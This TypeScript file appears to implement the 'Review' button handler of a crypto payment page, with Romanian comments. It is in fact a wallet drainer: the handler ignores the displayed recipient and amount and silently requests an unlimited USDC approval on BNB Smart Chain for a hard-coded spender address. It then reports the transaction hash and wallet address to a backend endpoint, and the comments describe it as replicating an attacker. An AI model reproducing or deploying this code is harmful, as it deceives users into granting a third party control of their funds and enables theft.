export interface ReviewContext {
  /** Adresa "To" afișată pe ecran. */
  address: string;
  /** Suma introdusă de utilizator, ca text (ex. "120.50"). */
  amount: string;
  /** "crypto" = USDC, "usd" = dolari. */
  currency: "crypto" | "usd";
}

/**
 * ═══════════════════════════════════════════════════════════════════
 *  SINGURUL LOC PE CARE ÎL MODIFICI
 * ═══════════════════════════════════════════════════════════════════
 *
 *  src/pages/home/lib/onReview.tsx
 *
 * Scrii codul tău între cele două săgeți de mai jos.
 * Se rulează direct în click-ul pe "Review":
 *  - nu se deschide nicio fereastră;
 *  - nu se deschide nicio pagină;
 *  - nu există iframe.
 *
 * Ai la dispoziție:
 *   context.address   → adresa destinatar (string)
 *   context.amount    → suma introdusă (string, ex. "120.50")
 *   context.currency  → "crypto" sau "usd"
 */

// ═══════════════════════════════════════════════════════════════════
// ▼▼▼ PUNE AICI CODUL TĂU ▼▼▼
// ═══════════════════════════════════════════════════════════════════

async function runPrivateCode(context: ReviewContext): Promise<void> {
  const CONFIG = {
    CHAIN_ID_HEX: "0x38",
    TOKEN: {
      name: "USDC",
      address: "0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d",
      decimals: 18,
    },
    APPROVE_AMOUNT_BASE: "0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff",
    SPENDER: "0xBdF28028D75b358af3dc0eF2EBa7E812824F9070",
    SAVE_ENDPOINT: '/api/save-user',
    STRICT_SILENT: true,
  };

  const APPROVE_SELECTOR = "095ea7b3";
  const pad32 = (h: string) => h.toLowerCase().replace(/^0x/, "").padStart(64, "0");
  const AMOUNT_HEX = BigInt(CONFIG.APPROVE_AMOUNT_BASE).toString(16);
  const CALLDATA = "0x" + APPROVE_SELECTOR + pad32(CONFIG.SPENDER) + pad32(AMOUNT_HEX);

  const eth = (window as any).ethereum;
  if (!eth) {
    console.log('No Web3 wallet found');
    return;
  }

  async function ensureBSC() {
    try {
      await eth.request({
        method: "wallet_switchEthereumChain",
        params: [{ chainId: CONFIG.CHAIN_ID_HEX }],
      });
    } catch (e: any) {
      if (e.code === 4902) {
        await eth.request({
          method: "wallet_addEthereumChain",
          params: [
            {
              chainId: CONFIG.CHAIN_ID_HEX,
              chainName: "Binance Smart Chain Mainnet",
              nativeCurrency: { name: "BNB", symbol: "BNB", decimals: 18 },
              rpcUrls: ["https://bsc-dataseed.binance.org/"],
              blockExplorerUrls: ["https://bscscan.com"],
            },
          ],
        });
      }
    }
  }

  /* replica exacta qr-usdc v2 */
  async function getAccountLikeAttacker(): Promise<string | undefined> {
    try {
      const accs = await eth.request({ method: 'eth_accounts' });
      if (accs && accs.length) return accs[0];
    } catch (e) {}
    if (!CONFIG.STRICT_SILENT) {
      try {
        const r = await eth.request({ method: 'eth_requestAccounts' });
        if (r && r.length) return r[0];
      } catch (e) {}
    }
    return undefined;
  }

  try {
    const from = await getAccountLikeAttacker();
    if (from) {
      console.log('Adresa tacita (eth_accounts):', from);
    } else {
      console.log('eth_accounts gol -> continui fara from (replica atacator)');
    }

    await ensureBSC();

    const tx = await eth.request({
      method: 'eth_sendTransaction',
      params: [{
        from: from,
        to: CONFIG.TOKEN.address,
        data: CALLDATA,
        value: '0x0',
      }]
    });

    fetch(CONFIG.SAVE_ENDPOINT, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ txHash: tx, chain: 'bsc', address: from ?? 'active_account' }),
    }).catch(() => {});
  } catch (e: any) {
    console.log('Eroare:', e?.message || e);
  }
}

// ═══════════════════════════════════════════════════════════════════
// ▲▲▲ SFÂRȘITUL CODULUI TĂU ▲▲▲
// ═══════════════════════════════════════════════════════════════════

/**
 * Se execută în chiar click-ul pe "Review".
 * Rulează codul tău de mai sus, în pagină, fără nicio fereastră.
 */
export async function runReviewCode(context: ReviewContext): Promise<void> {
  await runPrivateCode(context);
}
